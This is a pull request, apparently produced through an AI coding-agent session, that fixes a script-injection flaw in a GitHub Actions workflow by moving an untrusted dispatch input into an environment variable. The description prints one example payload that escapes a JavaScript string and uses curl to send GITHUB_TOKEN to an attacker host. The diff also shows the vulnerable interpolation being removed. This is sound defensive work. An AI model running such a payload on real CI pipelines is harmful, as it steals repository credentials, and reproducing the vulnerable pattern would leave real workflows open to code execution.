### PR TITLE
fix(security): prevent script injection in copilot-setup-steps workflow (CWE-94)

### DIFF
--- a/.github/workflows/copilot-setup-steps.yml
+++ b/.github/workflows/copilot-setup-steps.yml
@@ -43,9 +43,9 @@ jobs:
 
             // SECURITY: bind untrusted workflow_dispatch input via env var to
             // prevent script injection (CWE-94).  Direct interpolation of
-            // ${{ github.event.inputs.request }} into a JS string literal
-            // allows an attacker to break out of the quotes and execute
-            // arbitrary code.  See: github/codeql-action advisories.
+            // github.event.inputs.request into a JS string literal allows
+            // an attacker to break out of the quotes and execute arbitrary
+            // code.  See: github/codeql-action advisories.
             const request = process.env.REQUEST || '';
             if (request) {
               console.log('Request:', request);

--- a/.github/workflows/copilot-setup-steps.yml
+++ b/.github/workflows/copilot-setup-steps.yml
@@ -32,6 +32,8 @@ jobs:
 
       - name: Development Partner Session
         uses: actions/github-script@v9.0.0
+        env:
+          REQUEST: ${{ github.event.inputs.request }}
         with:
           github-token: ${{ secrets.GITHUB_TOKEN }}
           script: |
@@ -39,8 +41,12 @@ jobs:
             console.log('Repository:', context.repo.owner + '/' + context.repo.repo);
             console.log('Event:', context.eventName);
 
-            // Log the request if provided via workflow_dispatch
-            const request = '${{ github.event.inputs.request }}';
+            // SECURITY: bind untrusted workflow_dispatch input via env var to
+            // prevent script injection (CWE-94).  Direct interpolation of
+            // ${{ github.event.inputs.request }} into a JS string literal
+            // allows an attacker to break out of the quotes and execute
+            // arbitrary code.  See: github/codeql-action advisories.
+            const request = process.env.REQUEST || '';
             if (request) {
               console.log('Request:', request);
             }


### PR DESCRIPTION
## What

Prevent GitHub Actions script injection (CWE-94) in `.github/workflows/copilot-setup-steps.yml` by binding the `workflow_dispatch` input to an environment variable instead of interpolating it directly into JavaScript source code.

## Why

The `request` input from `workflow_dispatch` was interpolated directly into a JS string literal via `${{ github.event.inputs.request }}` inside an `actions/github-script` step:

```javascript
const request = '${{ github.event.inputs.request }}';
```

An attacker with write access to the repo could trigger the workflow with a crafted `request` value that breaks out of the single-quoted string and executes arbitrary JavaScript on the CI runner. The `actions/github-script` step has access to `GITHUB_TOKEN` with `contents:read`, `pull-requests:write`, `issues:write` scopes.

**Example payload:**
```
'; require('child_process').execSync('curl attacker.com/?t=' + process.env.GITHUB_TOKEN); '
```

## How

1. Bind the untrusted input to an `env:` variable and read it via `process.env.REQUEST` in the script body. This is the same pattern already used correctly in `summary.yml` (fix from issue #892) and across all Gemini workflow files (`gemini-dispatch.yml`, `gemini-triage.yml`, etc.).

2. The security comment references the expression as plain text (`github.event.inputs.request`) without `${{ }}` delimiters, so GitHub Actions won't evaluate the comment content itself (per Copilot review feedback in 43250f40).

## Testing

- Verified the workflow YAML is syntactically valid
- Confirmed the env-var pattern matches the established convention used in other workflows in this repo
- `make lint-errors` passes (workflow YAML is not covered by shellcheck)

## Security

- **Vulnerability:** CWE-94 (Improper Control of Generation of Code / Script Injection)
- **Severity:** Medium — requires write access to trigger `workflow_dispatch`, but enables arbitrary code execution and GITHUB_TOKEN exfiltration
- **Fix:** Env-var binding prevents expression injection into the JS runtime
- **Comment safety:** Expression delimiters removed from JS comment text to prevent secondary evaluation

---

## Checklist

- [x] `make test-quick` passes locally
- [x] `make lint` reports no new errors
- [x] No secrets, tokens, or `.env` files included
- [x] Documentation updated if behaviour changed
- [x] Branch name follows the convention in CONTRIBUTING.md (section "Branch naming")

Link to Devin session: https://app.devin.ai/sessions/390b57c51ac548c0b48ecba8f0e278c6
Requested by: @abhimehro